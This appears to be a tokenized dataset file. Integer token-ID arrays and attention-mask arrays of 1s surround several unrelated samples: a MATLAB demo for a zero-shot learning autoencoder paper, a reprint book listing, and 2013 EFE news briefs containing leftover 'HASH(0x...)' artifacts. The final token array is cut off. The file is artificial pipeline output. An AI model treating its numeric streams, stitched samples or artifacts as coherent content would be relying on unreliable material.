[ 1, 565, 871, 591, 1033, 409, 13, 13, 361, 871, 591, 1033, 1074, 8724, 278, 438, 791, 297, 4517, 29889, 896, 24765, 287, 29892, 4716, 505, 8676, 263, 9212, 310, 4832, 2440, 310, 27032, 21888, 322, 505, 1603, 5229, 304, 679, 278, 1035, 1127, 7018, 29892, 29873, 579, 267, 11558, 1135, 1556, 367, 261, 1506, 4167, 29889, 1577, 13, 13, 29950, 14004, 25897, 29892, 11102, 24067, 278, 6520, 304, 748, 304, 664, 29889, 29906, 29900, 29896, 29896, 29892, 1497, 28728, 1183, 674, 451, 7726, 304, 3148, 6673, 18935, 27504, 376, 7045, 825, 540, 1497, 1048, 590, 2278, 29889, 376, 3492, 508, 30010, 29873, 471, 29882, 445, 697, 3448, 491, 528, 5086, 590, 1361, 322, 5934, 5129, 29902, 30010, 29885, 7423, 29892, 1152, 599, 278, 9281, 678, 392, 335, 279, 29882, 10130, 3995, 4083, 3182, 29894, 29889, 9018, 304, 6826, 7360, 573, 4673, 13542, 315, 29781, 313, 6720, 20166, 29879, 29897, 297, 1716, 17692, 322, 17164, 10161, 304, 5706, 2820, 29871, 29896, 29945, 29900, 29892, 1497, 29901, 1346, 29898, 1576, 29897, 20886, 310, 5282, 663, 756, 8459, 451, 304, 10985, 382, 3210, 29903, 23330, 304, 1661, 29899, 29886, 2673, 414, 29892, 10842, 20549, 674, 4966, 670, 10917, 14311, 674, 1925, 701, 263, 2253, 1510, 297, 278, 1473, 3748, 29892, 7045, 896, 6914, 287, 1067, 2491, 404, 2750, 278, 364, 2806, 2222, 5101, 310, 28590, 492, 322, 435, 328, 8708, 408, 1532, 408, 278, 21162, 310, 278, 8957, 292, 1797, 5806, 727, 9455, 30010, 29873, 2086, 1784, 3987, 363, 278, 4223, 1348, 29899, 29873, 804, 304, 260, 682, 261, 411, 297, 278, 3815, 29973, 13, 13, 4230, 975, 310, 278, 1993, 29889, 1105, 2215, 29892, 1551, 29871, 29906, 29900, 3979, 29892, 5934, 278, 8271, 9451, 756, 5229, 304, 1207, 4312, 337, 9514, 29889, 450, 716, 12945, 29892, 29928, 3864, 19224, 6199, 29892, 816, 324, 1503, 526, 901, 8852, 297, 349, 5338, 29889, 29873, 15187, 1736, 310, 1616, 29889, 591, 2609, 1363, 21271, 338, 11826, 304, 664, 297, 29311, 3381, 411, 405, 17080, 29879, 763, 10937, 5454, 322, 349, 4519, 29892, 4977, 333, 29901, 1577, 13, 13, 6295, 29892, 4716, 756, 1784, 27335, 373, 7613, 29892, 1129, 272, 29973, 690, 1025, 29973, 319, 18994, 471, 14511, 630, 491, 278, 17517, 29886, 1295, 29884, 424, 304, 278, 5057, 9245, 5305, 1100, 5846, 29871, 29896, 29906, 29900, 29896, 29906, 530, 2756, 333, 485, 277, 471, 934, 29881, 491, 16790, 352, 2088, 28363, 7900, 22137, 2661, 403, 28288, 1451, 392, 335, 279, 29882, 4230, 4723, 450, 8973, 756, 10624, 278, 17517, 304, 3515, 263, 8898, 578, 393, 1316, 5227, 566, 437, 451, 2125, 2058, 297, 5434, 1152, 599, 278, 9281, 678, 392, 335, 279, 29882, 10130, 5142, 7560, 14657, 2401, 5853, 6376, 630, 10130, 1551, 29871, 29896, 29955, 3839, 29892, 322, 591, 6350, 714, 310, 278, 3787, 29892, 21589, 1056, 19881, 262, 7992, 29892, 541, 825, 338, 15709, 29973, 29933, 2015, 29892, 20944, 284, 391, 4104, 8708, 402, 328, 29887, 309, 1058, 750, 8859, 18397, 278, 3461, 373, 321, 1111, 29899, 23149, 3321, 20542, 297, 10504, 13491, 1446, 756, 1497, 393, 278, 476, 579, 332, 381, 574, 273, 3461, 338, 1577, 13, 13, 13468, 19134, 4076, 263, 12032, 2645, 263, 2919, 9004, 362, 373, 278, 15754, 29889, 910, 6839, 393, 18960, 892, 11826, 304, 15649, 964, 278, 11640, 310, 377, 3537, 404, 29892, 338, 21865, 630, 408, 278, 29871, 29946, 29945, 386, 3148, 6673, 29892, 450, 8291, 322, 3148, 972, 21543, 376, 621, 7823, 4531, 550, 292, 613, 25639, 28245, 12094, 405, 16546, 8931, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
%% %%% AwA DEMO %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % Following code shows a demo for AwA dataset to reproduce the result of the paper: % % Semantic Autoencoder for Zero-shot Learning. % % Elyor Kodirov, Tao Xiang, and Shaogang Gong % To appear in CVPR 2017. % % % You are supposed to get following: % [1] AwA ZSL accuracy [V >>> S]: 84.7% % [2] AwA ZSL accuracy [S >>> V]: 84.0% % % %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% % We used GoogleNet features. clc, clear all, close all addpath('data_zsl'); addpath('library'); %%%%% Load the data load('data_zsl/awa_demo_data.mat'); X_tr = NormalizeFea(X_tr')'; %%%%% Training % SAE lambda = 500000; W = SAE(X_tr', S_tr', lambda); %%%%% Test %%%%% param.HITK = 1; param.testclasses_id = param.testclasses_id; param.test_labels = param.test_labels; %[F --> S], projecting data from feature space to semantic sapce S_est = X_te * NormalizeFea(W)'; [zsl_accuracy, Y_hit5] = zsl_el((S_est), S_te_gt, param); fprintf('\n[1] AwA ZSL accuracy [V >>> S]: %.1f%%\n', zsl_accuracy*100); %[S --> F], projecting from semantic to visual space X_te_pro = NormalizeFea( S_te_pro')' * NormalizeFea(W); [zsl_accuracy]= zsl_el(X_te, X_te_pro, param); fprintf('[2] AwA ZSL accuracy [S >>> V]: %.1f%%\n', zsl_accuracy*100);
[ 1, 17806, 1273, 7686, 22886, 29909, 5012, 6720, 13, 28198, 28198, 28198, 28198, 28198, 28198, 28198, 28198, 29995, 13, 29995, 12206, 775, 3697, 263, 13455, 363, 22886, 29909, 8783, 304, 18532, 278, 1121, 310, 278, 5650, 29901, 13, 29995, 29871, 13, 29995, 9444, 7716, 11133, 3977, 6119, 363, 28933, 29899, 8962, 29257, 29889, 29871, 13, 29995, 29871, 13, 29995, 382, 368, 272, 476, 397, 3350, 29894, 29892, 323, 6241, 1060, 29875, 574, 29892, 322, 1383, 29874, 468, 574, 402, 549, 13, 29995, 1763, 2615, 297, 25778, 10593, 29871, 29906, 29900, 29896, 29955, 29889, 13, 29995, 29871, 13, 29995, 13, 29995, 887, 526, 7424, 304, 679, 1494, 29901, 13, 29995, 518, 29896, 29962, 22886, 29909, 796, 12750, 13600, 518, 29963, 8653, 317, 5387, 29871, 29947, 29946, 29889, 29955, 29995, 13, 29995, 518, 29906, 29962, 22886, 29909, 796, 12750, 13600, 518, 29903, 8653, 478, 5387, 29871, 29947, 29946, 29889, 29900, 29995, 13, 29995, 29871, 13, 29995, 1273, 28198, 28198, 28198, 28198, 28198, 28198, 28198, 16270, 7686, 13, 13, 13, 29995, 1334, 1304, 5087, 6779, 5680, 29889, 13, 695, 29883, 29892, 2821, 599, 29892, 29871, 3802, 599, 13, 13, 1202, 2084, 877, 1272, 29918, 29920, 2536, 2157, 13, 1202, 2084, 877, 5258, 2157, 13, 13, 16270, 29995, 16012, 278, 848, 13, 1359, 877, 1272, 29918, 29920, 2536, 29914, 10011, 29918, 17482, 29918, 1272, 29889, 2922, 2157, 13, 29990, 29918, 509, 1678, 353, 21981, 675, 8263, 29874, 29898, 29990, 29918, 509, 1495, 2670, 13, 13, 13, 16270, 29995, 26101, 13, 29995, 317, 16036, 13, 2892, 29871, 353, 29871, 29945, 29900, 29900, 29900, 29900, 29900, 29936, 13, 29956, 539, 353, 317, 16036, 29898, 29990, 29918, 509, 742, 317, 29918, 509, 742, 14013, 416, 13, 13, 13, 16270, 29995, 4321, 1273, 16270, 29871, 13, 3207, 29889, 29950, 1806, 29968, 965, 353, 29871, 29896, 29936, 13, 3207, 29889, 1688, 13203, 29918, 333, 353, 1828, 29889, 1688, 13203, 29918, 333, 29936, 13, 3207, 29889, 1688, 29918, 21134, 1678, 353, 1828, 29889, 1688, 29918, 21134, 29936, 13, 13, 29995, 29961, 29943, 6660, 317, 1402, 2060, 292, 848, 515, 4682, 2913, 304, 28837, 21672, 346, 29871, 13, 29903, 29918, 342, 4706, 353, 1060, 29918, 371, 334, 21981, 675, 8263, 29874, 29898, 29956, 29897, 2670, 29871, 13, 29961, 29920, 2536, 29918, 562, 2764, 4135, 29892, 612, 29918, 27342, 29945, 29962, 353, 503, 2536, 29918, 295, 3552, 29903, 29918, 342, 511, 317, 29918, 371, 29918, 4141, 29892, 1828, 416, 29871, 13, 13, 29888, 8124, 28909, 29876, 29961, 29896, 29962, 22886, 29909, 796, 12750, 13600, 518, 29963, 8653, 317, 5387, 18695, 29896, 29888, 7686, 29905, 29876, 742, 503, 2536, 29918, 562, 2764, 4135, 29930, 29896, 29900, 29900, 416, 13, 13, 29995, 29961, 29903, 6660, 383, 1402, 2060, 292, 515, 28837, 304, 7604, 2913, 13, 29990, 29918, 371, 29918, 771, 268, 353, 21981, 675, 8263, 29874, 29898, 317, 29918, 371, 29918, 771, 1495, 29915, 334, 21981, 675, 8263, 29874, 29898, 29956, 416, 13, 29961, 29920, 2536, 29918, 562, 2764, 4135, 13192, 503, 2536, 29918, 295, 29898, 29990, 29918, 371, 29892, 1060, 29918, 371, 29918, 771, 29892, 1828, 416, 29871, 13, 29888, 8124, 877, 29961, 29906, 29962, 22886, 29909, 796, 12750, 13600, 518, 29903, 8653, 478, 5387, 18695, 29896, 29888, 7686, 29905, 29876, 742, 503, 2536, 29918, 562, 2764, 4135, 29930, 29896, 29900, 29900, 416, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Product Overview Publisher: Sherwood, Gilbert and Piper Publication date: 1846 Subjects: Medicine Medical / General Medical / Surgery / General Medical / Surgery / Neurosurgery Notes: This is an OCR reprint. There may be numerous typos or missing text. There are no illustrations or indexes. When you buy the General Books edition of this book you get free trial access to Million-Books.com where you can select from more than a million books for free. You can also preview the book there.
[ 1, 10969, 6811, 1493, 13, 13, 21076, 1674, 261, 29901, 17375, 6115, 29892, 23657, 322, 7362, 546, 5236, 362, 2635, 29901, 29871, 29896, 29947, 29946, 29953, 3323, 622, 29879, 29901, 27529, 20795, 847, 4593, 20795, 847, 317, 2007, 708, 847, 4593, 20795, 847, 317, 2007, 708, 847, 17574, 1883, 2007, 708, 8695, 29901, 910, 338, 385, 438, 11341, 2062, 524, 29889, 1670, 1122, 367, 12727, 7911, 1066, 470, 4567, 1426, 29889, 1670, 526, 694, 8632, 800, 470, 18111, 29889, 1932, 366, 15649, 278, 4593, 13730, 12203, 310, 445, 3143, 366, 679, 3889, 14260, 2130, 304, 8649, 291, 29899, 10967, 29879, 29889, 510, 988, 366, 508, 1831, 515, 901, 1135, 263, 7284, 8277, 363, 3889, 29889, 887, 508, 884, 25267, 278, 3143, 727, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
EFE News Briefs for Friday, Aug. 16 Deadly nationwide clashes involving supporters and opponents of deposed President Mohammed Morsi erupted again in Egypt, where "day of rage" protests by Islamists fueled fears that the country could be lurching toward civil war. The casualty count varied widely depending on the source, with the Health Ministry confirming only 17 people dead and 82 wounded across the country's 27 provinces, while the pro-Morsi Muslim Brotherhood said more than 100 people died in Cairo alone. Thousands of Brotherhood members defied a state of emergency and gathered near the Al-Fath mosque in the capital district of Ramses. They were met by a heavy security deployment and the presence on the streets of members of anti-Morsi vigilante groups armed with sticks and knives. In both the capital and the provinces, demonstrators attacked police stations, Christian churches and provincial government offices and used burning tires to block roads as part of the "day of rage." HASH(0xa4d5864) ___ HASH(0xa4d65ec) Son of Mexican who nationalized oil blasts gov't energy plan HASH(0xa4d66dc) The son of the president who nationalized Mexico's oil industry said the goal of current head of state Enrique Peña Nieto's energy plan was to strip the state of its role in managing the country's hydrocarbon resources. That goes "against the ideology, the politics, of everything that Lazaro Cardenas (his father and Mexico's president from 1934-1940) did in his life," he said. HASH(0xa4d7954) ___ HASH(0xa4d7a44) Mexican community threatened after troops disarm local militia HASH(0xa4d7b34) An indigenous community on Mexico's Pacific coast says it is facing a renewed threat from organized crime after the army effectively dismantled a local self-defense group. "They sent me two harsh threats, that if I don't shut up they're going to come for me, and for the rest of the comrades," Aquila spokesman Octavio Villanueva Magaña told MVS radio Friday. The threats came hours after he spoke out on Thursday to complain that the community had been left defenseless by the army's move against its militia, Villanueva Magaña said. Residents of Aquila and other indigenous communities in the western state of Michoacan recently formed militias to defend themselves against a criminal organization that calls itself "Los Caballeros Templarios" (Knights Templar). HASH(0xa4d8970) ___ HASH(0xa4d8a3c) 4 Die in attack on train in Pakistan HASH(0xa4d8b2c) Four people were killed and a score of others wounded in an attack on a passenger train in western Pakistan, police told Efe. "First they launched a rocket that damaged the train engine, but did not cause casualties, and later a firefight broke out between the attackers and the security forces who arrived at the scene," Ghulam Murtaza said from a police post in the Bolan district. While unable to identify the dead, the officer said all of the wounded were train passengers and that four of them were in critical condition. No group has claimed responsibility for the late morning attack on the Jaffar Express, which links the southwestern city of Quetta with Rawalpindi, near Islamabad. HASH(0xa4d9c08) ___ HASH(0xa4d9cd4) Ecuador abandons plan to leave oil in the ground HASH(0xa4d9dc4) Ecuadorian President Rafael Correa has announced the end of the Yasuni-ITT initiative, saying the international community "failed" the country by not funding a scheme that would have compensated it for not developing Amazon oil reserves. "The key factor in this failure is the world's great hypocrisy," Correa said in an address to the nation Thursday in which he announced he would seek congressional authorization to develop crude reserves in northeastern Ecuador's Yasuni national park. Correa says developing the ITT crude reserves using "proper techniques" will affect less than 1 percent of the park and provide the nation with $18.29 billion in revenue. The ITT block is estimated to hold some 920 million barrels of oil. As part of the environmental initiative, Ecuador had aspired to raise some $3.6 billion in compensation from the international community over 12 years. HASH(0xa4d85a8) ___ HASH(0xa4d8674) 3 Bodies recovered from stricken Indian sub HASH(0xa4d8764) Divers recovered the bodies of three of the 18 people thought to have died aboard a submarine that sank in Mumbai harbor, an Indian navy spokesman told Efe. The operation will continue until all the bodies are found, P.V.S. Satish said. While many of the crew managed to leap into the water, three officers and 15 sailors were trapped aboard the diesel-powered INS Sindhurakshak when it sank in the wee hours of Wednesday after a fire and several explosions. The 16-year-old Sindhurakshak, a Russian-made vessel, underwent an $80 million overhaul following a February 2010 fire that left one sailor dead and two others injured.
[ 1, 382, 16359, 10130, 1771, 2575, 29879, 363, 28728, 29892, 22333, 29889, 29871, 29896, 29953, 13, 13, 29928, 1479, 368, 5233, 8157, 1067, 1161, 267, 21677, 1462, 272, 2153, 322, 23995, 1237, 310, 316, 4752, 7178, 12929, 28913, 341, 943, 29875, 604, 21245, 287, 1449, 297, 12892, 29892, 988, 376, 3250, 310, 1153, 479, 29908, 10021, 29879, 491, 16427, 2879, 3576, 839, 8866, 29879, 393, 278, 4234, 1033, 367, 301, 2458, 292, 11183, 7631, 1370, 29889, 13, 13, 1576, 3209, 950, 1017, 2302, 23821, 17644, 8679, 373, 278, 2752, 29892, 411, 278, 15202, 20886, 9659, 292, 871, 29871, 29896, 29955, 2305, 7123, 322, 29871, 29947, 29906, 19747, 4822, 278, 4234, 29915, 29879, 29871, 29906, 29955, 28058, 29892, 1550, 278, 410, 29899, 29924, 943, 29875, 23772, 4358, 721, 6614, 1497, 901, 1135, 29871, 29896, 29900, 29900, 2305, 6423, 297, 315, 26025, 7432, 29889, 13, 13, 1349, 681, 4167, 310, 4358, 721, 6614, 5144, 822, 1000, 263, 2106, 310, 11176, 14703, 322, 22229, 2978, 278, 838, 29899, 29943, 493, 19767, 802, 297, 278, 7483, 6474, 310, 390, 2232, 267, 29889, 2688, 892, 1539, 491, 263, 9416, 6993, 18209, 322, 278, 10122, 373, 278, 19756, 310, 5144, 310, 9418, 29899, 29924, 943, 29875, 14877, 309, 1647, 6471, 23926, 411, 380, 7358, 322, 889, 3145, 29889, 13, 13, 797, 1716, 278, 7483, 322, 278, 28058, 29892, 9004, 4097, 22630, 10974, 16355, 29892, 6111, 26014, 322, 25750, 5874, 25222, 322, 1304, 25535, 260, 2658, 304, 2908, 25320, 408, 760, 310, 278, 376, 3250, 310, 1153, 479, 1213, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29945, 29947, 29953, 29946, 29897, 13, 13, 22359, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29953, 29945, 687, 29897, 13, 13, 29903, 265, 310, 24777, 1058, 4797, 1891, 17182, 1999, 19416, 330, 586, 29915, 29873, 5864, 3814, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29953, 29953, 13891, 29897, 13, 13, 1576, 1487, 310, 278, 6673, 1058, 4797, 1891, 12568, 29915, 29879, 17182, 13661, 1497, 278, 7306, 310, 1857, 2343, 310, 2106, 1174, 14090, 3938, 9658, 405, 2035, 29877, 29915, 29879, 5864, 3814, 471, 304, 17820, 278, 2106, 310, 967, 6297, 297, 767, 6751, 278, 4234, 29915, 29879, 17546, 4287, 6718, 7788, 29889, 13, 13, 7058, 5771, 376, 351, 475, 303, 278, 1957, 3002, 29892, 278, 22661, 29892, 310, 4129, 393, 19575, 8854, 315, 7879, 294, 313, 22880, 4783, 322, 12568, 29915, 29879, 6673, 515, 29871, 29896, 29929, 29941, 29946, 29899, 29896, 29929, 29946, 29900, 29897, 1258, 297, 670, 2834, 1699, 540, 1497, 29889, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29955, 29929, 29945, 29946, 29897, 13, 13, 22359, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29955, 29874, 29946, 29946, 29897, 13, 13, 29924, 735, 2185, 7881, 29513, 1156, 13230, 766, 2817, 1887, 5549, 423, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29955, 29890, 29941, 29946, 29897, 13, 13, 2744, 1399, 2101, 681, 7881, 373, 12568, 29915, 29879, 14328, 12180, 4083, 372, 338, 14870, 263, 23011, 287, 28469, 515, 19098, 17268, 1156, 278, 9987, 17583, 766, 29885, 424, 839, 263, 1887, 1583, 29899, 1753, 1947, 2318, 29889, 13, 13, 29908, 15597, 2665, 592, 1023, 4023, 845, 12455, 1446, 29892, 393, 565, 306, 1016, 29915, 29873, 12522, 701, 896, 29915, 276, 2675, 304, 2041, 363, 592, 29892, 322, 363, 278, 1791, 310, 278, 419, 29878, 3076, 1699, 16020, 4233, 805, 23195, 1171, 4756, 485, 601, 9887, 273, 434, 1564, 3561, 9244, 5429, 341, 21819, 7155, 28728, 29889, 13, 13, 1576, 12455, 1446, 2996, 6199, 1156, 540, 12707, 714, 373, 498, 1295, 3250, 304, 752, 7420, 393, 278, 7881, 750, 1063, 2175, 822, 575, 6393, 491, 278, 9987, 29915, 29879, 4337, 2750, 967, 5549, 423, 29892, 9887, 273, 434, 1564, 3561, 9244, 1497, 29889, 13, 13, 1666, 16719, 310, 16020, 4233, 322, 916, 1399, 2101, 681, 23507, 297, 278, 15782, 2106, 310, 3375, 29877, 562, 273, 10325, 8429, 5549, 3173, 304, 24663, 6053, 2750, 263, 22161, 13013, 393, 5717, 3528, 376, 29286, 11680, 497, 9672, 6789, 572, 8596, 29908, 313, 29968, 29876, 5861, 6789, 572, 279, 467, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29947, 29929, 29955, 29900, 29897, 13, 13, 22359, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29947, 29874, 29941, 29883, 29897, 13, 13, 29946, 1640, 297, 5337, 373, 7945, 297, 21215, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29947, 29890, 29906, 29883, 29897, 13, 13, 29943, 473, 2305, 892, 9445, 322, 263, 8158, 310, 4045, 19747, 297, 385, 5337, 373, 263, 28507, 7945, 297, 15782, 21215, 29892, 10974, 5429, 382, 1725, 29889, 13, 13, 29908, 6730, 896, 15241, 263, 696, 3522, 393, 5625, 4063, 278, 7945, 6012, 29892, 541, 1258, 451, 4556, 3209, 950, 2938, 29892, 322, 2678, 263, 3974, 29888, 523, 14455, 714, 1546, 278, 5337, 414, 322, 278, 6993, 8249, 1058, 11977, 472, 278, 9088, 1699, 13491, 352, 314, 341, 4227, 19924, 1497, 515, 263, 10974, 1400, 297, 278, 8922, 273, 6474, 29889, 13, 13, 8809, 488, 9368, 304, 12439, 278, 7123, 29892, 278, 12139, 1497, 599, 310, 278, 19747, 892, 7945, 28134, 322, 393, 3023, 310, 963, 892, 297, 12187, 4195, 29889, 13, 13, 3782, 2318, 756, 17049, 23134, 363, 278, 5683, 7250, 5337, 373, 278, 435, 3470, 279, 14657, 29892, 607, 2988, 278, 7062, 22741, 4272, 310, 751, 11300, 411, 22038, 284, 29886, 14108, 29892, 2978, 16427, 20143, 29889, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29929, 29883, 29900, 29947, 29897, 13, 13, 22359, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29929, 2252, 29946, 29897, 13, 13, 29923, 26719, 633, 392, 787, 3814, 304, 5967, 17182, 297, 278, 5962, 13, 13, 29950, 24943, 29898, 29900, 17367, 29946, 29881, 29929, 13891, 29946, 29897, 13, 13, 29923, 26719, 713, 7178, 25661, 2994, 5638, 756, 9326, 278, 1095, 310, 278, 612, 294, 3909, 29899, 1806, 29911, 14511, 1230, 29892, 5934, 278, 6121, 7881, 376, 26061, 29908, 278, 4234, 491, 451, 5220, 292, 263, 11380, 393, 723, 505, 22874, 630, 372, 363, 451, 14338, 16631, 17182, 620, 20098, 29889, 13, 13, 29908, 1576, 1820, 7329, 297, 445, 10672, 338, 278, 3186, 29915, 29879, 2107, 10163, 542, 3780, 29891, 1699, 2994, 5638, 1497, 297, 385, 3211, 304, 278, 5233, 498, 1295, 3250, 297, 607, 540, 9326, 540, 723, 16508, 378, 11476, 284, 28733, 304, 2693, 7618, 311, 620, 20098, 297, 302, 441, 354, 11530, 382, 26719, 29915, 29879, 612, 294, 3909, 4797, 14089, 29889, 13, 13, 12521, 5638, 4083, 14338, 278, 13315, 29911, 7618, 311, 620, 20098, 773, 376, 771, 546, 13698, 29908, 674, 6602, 3109, 1135, 29871, 29896, 10151, 310, 278, 14089, 322, 3867, 278, 5233, 411, 395, 29896, 29947, 29889, 29906, 29929, 24464, 297, 337, 9947, 29889, 13, 13, 1576, 13315, 29911, 2908, 338, 